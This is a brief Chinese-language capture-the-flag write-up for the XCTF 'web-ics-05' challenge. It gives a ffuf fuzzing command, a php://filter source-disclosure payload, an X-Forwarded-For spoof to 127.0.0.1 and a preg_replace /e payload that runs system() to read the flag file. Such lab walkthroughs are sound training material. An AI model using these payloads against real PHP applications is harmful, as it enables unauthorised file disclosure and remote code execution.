XCTF-web-ics-05
看一下有什么
只有/index.php
模糊测试得到一个page
┌──(kali㉿kali)-[~]
└─$ ffuf -u "http://223.112.5.141:52073/index.php?FUZZ=FUZZ" -w /usr/share/wordlists/rockyou.txt -fc 403 -c -fs 2305 -s
page
尝试用php伪协议读取源码?page=php://filter/read=convert.base64-encode/resource=index.php
<?php
$page = $_GET[page];
if (isset($page)) {
if (ctype_alnum($page)) {
?>
<?php
}else{
?>
<?php
}}
//方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试
if ($_SERVER['HTTP_X_FORWARDED_FOR'] == '127.0.0.1') {echo "<br >Welcome My Admin ! <br >";$pattern = $_GET[pat];$replacement = $_GET[rep];$subject = $_GET[sub];if (isset($pattern) && isset($replacement) && isset($subject)) {preg_replace($pattern, $replacement, $subject);}else{die();}
}
?>
改一下HTTP_X_FORWARDED_FOR为127.0.0.1
preg_replace 函数:preg_replace ($pattern, $replacement, $subject) 函数会将 subject 中匹配 pattern 的部分用 replacement 替换,启用 /e 参数,就会将 replacement 当做 php 代码执行
flag:?pat=/abc/e&rep=system(‘cat+s3chahahaDir/flag/flag.php’)&sub=abc
